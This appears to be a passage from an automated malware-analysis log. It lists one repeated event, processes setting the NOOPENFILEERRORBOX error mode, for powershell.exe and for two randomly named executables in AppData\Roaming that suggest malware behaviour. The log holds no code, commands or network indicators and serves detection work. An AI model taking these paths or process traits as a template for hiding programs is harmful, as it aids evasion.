                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
